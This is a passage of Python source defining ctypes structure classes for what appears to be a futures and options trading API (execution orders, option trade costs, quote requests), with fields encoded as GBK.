if ExchMiniMargin:
self.ExchMiniMargin = ExchMiniMargin
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class QryOptionInstrTradeCost(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("HedgeFlag", c_char),
("InputPrice", c_double),
("UnderlyingPrice", c_double),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, HedgeFlag=None, InputPrice=None, UnderlyingPrice=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if InputPrice:
self.InputPrice = InputPrice
if UnderlyingPrice:
self.UnderlyingPrice = UnderlyingPrice
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class QryOptionInstrCommRate(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class IndexPrice(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InstrumentID", c_char_Array_31),
("ClosePrice", c_double),
]
def __init__(self, BrokerID=None, InstrumentID=None, ClosePrice=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ClosePrice:
self.ClosePrice = ClosePrice
class InputExecOrder(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ExecOrderRef", c_char_Array_13),
("UserID", c_char_Array_16),
("Volume", c_int),
("RequestID", c_int),
("BusinessUnit", c_char_Array_21),
("OffsetFlag", c_char),
("HedgeFlag", c_char),
("ActionType", c_char),
("PosiDirection", c_char),
("ReservePositionFlag", c_char),
("CloseFlag", c_char),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
("ClientID", c_char_Array_11),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExecOrderRef=None, UserID=None, Volume=None, RequestID=None, BusinessUnit=None, OffsetFlag=None, HedgeFlag=None, ActionType=None, PosiDirection=None, ReservePositionFlag=None, CloseFlag=None, ExchangeID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, ClientID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExecOrderRef:
self.ExecOrderRef = ExecOrderRef.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if Volume:
self.Volume = Volume
if RequestID:
self.RequestID = RequestID
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if OffsetFlag:
self.OffsetFlag = OffsetFlag.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if ActionType:
self.ActionType = ActionType.encode("GBK")
if PosiDirection:
self.PosiDirection = PosiDirection.encode("GBK")
if ReservePositionFlag:
self.ReservePositionFlag = ReservePositionFlag.encode("GBK")
if CloseFlag:
self.CloseFlag = CloseFlag.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class InputExecOrderAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("ExecOrderActionRef", c_int),
("ExecOrderRef", c_char_Array_13),
("RequestID", c_int),
("FrontID", c_int),
("SessionID", c_int),
("ExchangeID", c_char_Array_9),
("ExecOrderSysID", c_char_Array_21),
("ActionFlag", c_char),
("UserID", c_char_Array_16),
("InstrumentID", c_char_Array_31),
("InvestUnitID", c_char_Array_17),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, ExecOrderActionRef=None, ExecOrderRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, ExecOrderSysID=None, ActionFlag=None, UserID=None, InstrumentID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if ExecOrderActionRef:
self.ExecOrderActionRef = ExecOrderActionRef
if ExecOrderRef:
self.ExecOrderRef = ExecOrderRef.encode("GBK")
if RequestID:
self.RequestID = RequestID
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ExecOrderSysID:
self.ExecOrderSysID = ExecOrderSysID.encode("GBK")
if ActionFlag:
self.ActionFlag = ActionFlag.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class ExecOrder(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ExecOrderRef", c_char_Array_13),
("UserID", c_char_Array_16),
("Volume", c_int),
("RequestID", c_int),
("BusinessUnit", c_char_Array_21),
("OffsetFlag", c_char),
("HedgeFlag", c_char),
("ActionType", c_char),
("PosiDirection", c_char),
("ReservePositionFlag", c_char),
("CloseFlag", c_char),
("ExecOrderLocalID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("OrderSubmitStatus", c_char),
("NotifySequence", c_int),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("ExecOrderSysID", c_char_Array_21),
("InsertDate", c_char_Array_9),
("InsertTime", c_char_Array_9),
("CancelTime", c_char_Array_9),
("ExecResult", c_char),
("ClearingPartID", c_char_Array_11),
("SequenceNo", c_int),
("FrontID", c_int),
("SessionID", c_int),
("UserProductInfo", c_char_Array_11),
("StatusMsg", c_char_Array_81),
("ActiveUserID", c_char_Array_16),
("BrokerExecOrderSeq", c_int),
("BranchID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExecOrderRef=None, UserID=None, Volume=None, RequestID=None, BusinessUnit=None, OffsetFlag=None, HedgeFlag=None, ActionType=None, PosiDirection=None, ReservePositionFlag=None, CloseFlag=None, ExecOrderLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, OrderSubmitStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, ExecOrderSysID=None, InsertDate=None, InsertTime=None, CancelTime=None, ExecResult=None, ClearingPartID=None, SequenceNo=None, FrontID=None, SessionID=None, UserProductInfo=None, StatusMsg=None, ActiveUserID=None, BrokerExecOrderSeq=None, BranchID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExecOrderRef:
self.ExecOrderRef = ExecOrderRef.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if Volume:
self.Volume = Volume
if RequestID:
self.RequestID = RequestID
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if OffsetFlag:
self.OffsetFlag = OffsetFlag.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if ActionType:
self.ActionType = ActionType.encode("GBK")
if PosiDirection:
self.PosiDirection = PosiDirection.encode("GBK")
if ReservePositionFlag:
self.ReservePositionFlag = ReservePositionFlag.encode("GBK")
if CloseFlag:
self.CloseFlag = CloseFlag.encode("GBK")
if ExecOrderLocalID:
self.ExecOrderLocalID = ExecOrderLocalID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if OrderSubmitStatus:
self.OrderSubmitStatus = OrderSubmitStatus.encode("GBK")
if NotifySequence:
self.NotifySequence = NotifySequence
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if ExecOrderSysID:
self.ExecOrderSysID = ExecOrderSysID.encode("GBK")
if InsertDate:
self.InsertDate = InsertDate.encode("GBK")
if InsertTime:
self.InsertTime = InsertTime.encode("GBK")
if CancelTime:
self.CancelTime = CancelTime.encode("GBK")
if ExecResult:
self.ExecResult = ExecResult.encode("GBK")
if ClearingPartID:
self.ClearingPartID = ClearingPartID.encode("GBK")
if SequenceNo:
self.SequenceNo = SequenceNo
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if UserProductInfo:
self.UserProductInfo = UserProductInfo.encode("GBK")
if StatusMsg:
self.StatusMsg = StatusMsg.encode("GBK")
if ActiveUserID:
self.ActiveUserID = ActiveUserID.encode("GBK")
if BrokerExecOrderSeq:
self.BrokerExecOrderSeq = BrokerExecOrderSeq
if BranchID:
self.BranchID = BranchID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class ExecOrderAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("ExecOrderActionRef", c_int),
("ExecOrderRef", c_char_Array_13),
("RequestID", c_int),
("FrontID", c_int),
("SessionID", c_int),
("ExchangeID", c_char_Array_9),
("ExecOrderSysID", c_char_Array_21),
("ActionFlag", c_char),
("ActionDate", c_char_Array_9),
("ActionTime", c_char_Array_9),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("ExecOrderLocalID", c_char_Array_13),
("ActionLocalID", c_char_Array_13),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("BusinessUnit", c_char_Array_21),
("OrderActionStatus", c_char),
("UserID", c_char_Array_16),
("ActionType", c_char),
("StatusMsg", c_char_Array_81),
("InstrumentID", c_char_Array_31),
("BranchID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, ExecOrderActionRef=None, ExecOrderRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, ExecOrderSysID=None, ActionFlag=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, ExecOrderLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, ActionType=None, StatusMsg=None, InstrumentID=None, BranchID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if ExecOrderActionRef:
self.ExecOrderActionRef = ExecOrderActionRef
if ExecOrderRef:
self.ExecOrderRef = ExecOrderRef.encode("GBK")
if RequestID:
self.RequestID = RequestID
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ExecOrderSysID:
self.ExecOrderSysID = ExecOrderSysID.encode("GBK")
if ActionFlag:
self.ActionFlag = ActionFlag.encode("GBK")
if ActionDate:
self.ActionDate = ActionDate.encode("GBK")
if ActionTime:
self.ActionTime = ActionTime.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if ExecOrderLocalID:
self.ExecOrderLocalID = ExecOrderLocalID.encode("GBK")
if ActionLocalID:
self.ActionLocalID = ActionLocalID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if OrderActionStatus:
self.OrderActionStatus = OrderActionStatus.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if ActionType:
self.ActionType = ActionType.encode("GBK")
if StatusMsg:
self.StatusMsg = StatusMsg.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if BranchID:
self.BranchID = BranchID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class QryExecOrder(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("ExecOrderSysID", c_char_Array_21),
("InsertTimeStart", c_char_Array_9),
("InsertTimeEnd", c_char_Array_9),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, ExecOrderSysID=None, InsertTimeStart=None, InsertTimeEnd=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ExecOrderSysID:
self.ExecOrderSysID = ExecOrderSysID.encode("GBK")
if InsertTimeStart:
self.InsertTimeStart = InsertTimeStart.encode("GBK")
if InsertTimeEnd:
self.InsertTimeEnd = InsertTimeEnd.encode("GBK")
class ExchangeExecOrder(Struct):
_fields_ = [
("Volume", c_int),
("RequestID", c_int),
("BusinessUnit", c_char_Array_21),
("OffsetFlag", c_char),
("HedgeFlag", c_char),
("ActionType", c_char),
("PosiDirection", c_char),
("ReservePositionFlag", c_char),
("CloseFlag", c_char),
("ExecOrderLocalID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("OrderSubmitStatus", c_char),
("NotifySequence", c_int),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("ExecOrderSysID", c_char_Array_21),
("InsertDate", c_char_Array_9),
("InsertTime", c_char_Array_9),
("CancelTime", c_char_Array_9),
("ExecResult", c_char),
("ClearingPartID", c_char_Array_11),
("SequenceNo", c_int),
("BranchID", c_char_Array_9),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, Volume=None, RequestID=None, BusinessUnit=None, OffsetFlag=None, HedgeFlag=None, ActionType=None, PosiDirection=None, ReservePositionFlag=None, CloseFlag=None, ExecOrderLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, OrderSubmitStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, ExecOrderSysID=None, InsertDate=None, InsertTime=None, CancelTime=None, ExecResult=None, ClearingPartID=None, SequenceNo=None, BranchID=None, IPAddress=None, MacAddress=None):
super().__init__()
if Volume:
self.Volume = Volume
if RequestID:
self.RequestID = RequestID
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if OffsetFlag:
self.OffsetFlag = OffsetFlag.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if ActionType:
self.ActionType = ActionType.encode("GBK")
if PosiDirection:
self.PosiDirection = PosiDirection.encode("GBK")
if ReservePositionFlag:
self.ReservePositionFlag = ReservePositionFlag.encode("GBK")
if CloseFlag:
self.CloseFlag = CloseFlag.encode("GBK")
if ExecOrderLocalID:
self.ExecOrderLocalID = ExecOrderLocalID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if OrderSubmitStatus:
self.OrderSubmitStatus = OrderSubmitStatus.encode("GBK")
if NotifySequence:
self.NotifySequence = NotifySequence
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if ExecOrderSysID:
self.ExecOrderSysID = ExecOrderSysID.encode("GBK")
if InsertDate:
self.InsertDate = InsertDate.encode("GBK")
if InsertTime:
self.InsertTime = InsertTime.encode("GBK")
if CancelTime:
self.CancelTime = CancelTime.encode("GBK")
if ExecResult:
self.ExecResult = ExecResult.encode("GBK")
if ClearingPartID:
self.ClearingPartID = ClearingPartID.encode("GBK")
if SequenceNo:
self.SequenceNo = SequenceNo
if BranchID:
self.BranchID = BranchID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class QryExchangeExecOrder(Struct):
_fields_ = [
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("TraderID", c_char_Array_21),
]
def __init__(self, ParticipantID=None, ClientID=None, ExchangeInstID=None, ExchangeID=None, TraderID=None):
super().__init__()
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
class QryExecOrderAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
]
def __init__(self, BrokerID=None, InvestorID=None, ExchangeID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class ExchangeExecOrderAction(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("ExecOrderSysID", c_char_Array_21),
("ActionFlag", c_char),
("ActionDate", c_char_Array_9),
("ActionTime", c_char_Array_9),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("ExecOrderLocalID", c_char_Array_13),
("ActionLocalID", c_char_Array_13),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("BusinessUnit", c_char_Array_21),
("OrderActionStatus", c_char),
("UserID", c_char_Array_16),
("ActionType", c_char),
("BranchID", c_char_Array_9),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
("ExchangeInstID", c_char_Array_31),
("Volume", c_int),
]
def __init__(self, ExchangeID=None, ExecOrderSysID=None, ActionFlag=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, ExecOrderLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, ActionType=None, BranchID=None, IPAddress=None, MacAddress=None, ExchangeInstID=None, Volume=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ExecOrderSysID:
self.ExecOrderSysID = ExecOrderSysID.encode("GBK")
if ActionFlag:
self.ActionFlag = ActionFlag.encode("GBK")
if ActionDate:
self.ActionDate = ActionDate.encode("GBK")
if ActionTime:
self.ActionTime = ActionTime.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if ExecOrderLocalID:
self.ExecOrderLocalID = ExecOrderLocalID.encode("GBK")
if ActionLocalID:
self.ActionLocalID = ActionLocalID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if OrderActionStatus:
self.OrderActionStatus = OrderActionStatus.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if ActionType:
self.ActionType = ActionType.encode("GBK")
if BranchID:
self.BranchID = BranchID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if Volume:
self.Volume = Volume
class QryExchangeExecOrderAction(Struct):
_fields_ = [
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeID", c_char_Array_9),
("TraderID", c_char_Array_21),
]
def __init__(self, ParticipantID=None, ClientID=None, ExchangeID=None, TraderID=None):
super().__init__()
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
class ErrExecOrder(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ExecOrderRef", c_char_Array_13),
("UserID", c_char_Array_16),
("Volume", c_int),
("RequestID", c_int),
("BusinessUnit", c_char_Array_21),
("OffsetFlag", c_char),
("HedgeFlag", c_char),
("ActionType", c_char),
("PosiDirection", c_char),
("ReservePositionFlag", c_char),
("CloseFlag", c_char),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
("ClientID", c_char_Array_11),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExecOrderRef=None, UserID=None, Volume=None, RequestID=None, BusinessUnit=None, OffsetFlag=None, HedgeFlag=None, ActionType=None, PosiDirection=None, ReservePositionFlag=None, CloseFlag=None, ExchangeID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, ClientID=None, IPAddress=None, MacAddress=None, ErrorID=None, ErrorMsg=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExecOrderRef:
self.ExecOrderRef = ExecOrderRef.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if Volume:
self.Volume = Volume
if RequestID:
self.RequestID = RequestID
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if OffsetFlag:
self.OffsetFlag = OffsetFlag.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if ActionType:
self.ActionType = ActionType.encode("GBK")
if PosiDirection:
self.PosiDirection = PosiDirection.encode("GBK")
if ReservePositionFlag:
self.ReservePositionFlag = ReservePositionFlag.encode("GBK")
if CloseFlag:
self.CloseFlag = CloseFlag.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
class QryErrExecOrder(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
]
def __init__(self, BrokerID=None, InvestorID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
class ErrExecOrderAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("ExecOrderActionRef", c_int),
("ExecOrderRef", c_char_Array_13),
("RequestID", c_int),
("FrontID", c_int),
("SessionID", c_int),
("ExchangeID", c_char_Array_9),
("ExecOrderSysID", c_char_Array_21),
("ActionFlag", c_char),
("UserID", c_char_Array_16),
("InstrumentID", c_char_Array_31),
("InvestUnitID", c_char_Array_17),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
]
def __init__(self, BrokerID=None, InvestorID=None, ExecOrderActionRef=None, ExecOrderRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, ExecOrderSysID=None, ActionFlag=None, UserID=None, InstrumentID=None, InvestUnitID=None, IPAddress=None, MacAddress=None, ErrorID=None, ErrorMsg=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if ExecOrderActionRef:
self.ExecOrderActionRef = ExecOrderActionRef
if ExecOrderRef:
self.ExecOrderRef = ExecOrderRef.encode("GBK")
if RequestID:
self.RequestID = RequestID
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ExecOrderSysID:
self.ExecOrderSysID = ExecOrderSysID.encode("GBK")
if ActionFlag:
self.ActionFlag = ActionFlag.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
class QryErrExecOrderAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
]
def __init__(self, BrokerID=None, InvestorID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
class OptionInstrTradingRight(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("Direction", c_char),
("TradingRight", c_char),
]
def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, Direction=None, TradingRight=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
if TradingRight:
self.TradingRight = TradingRight.encode("GBK")
class QryOptionInstrTradingRight(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("Direction", c_char),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, Direction=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
class InputForQuote(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ForQuoteRef", c_char_Array_13),
("UserID", c_char_Array_16),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ForQuoteRef=None, UserID=None, ExchangeID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
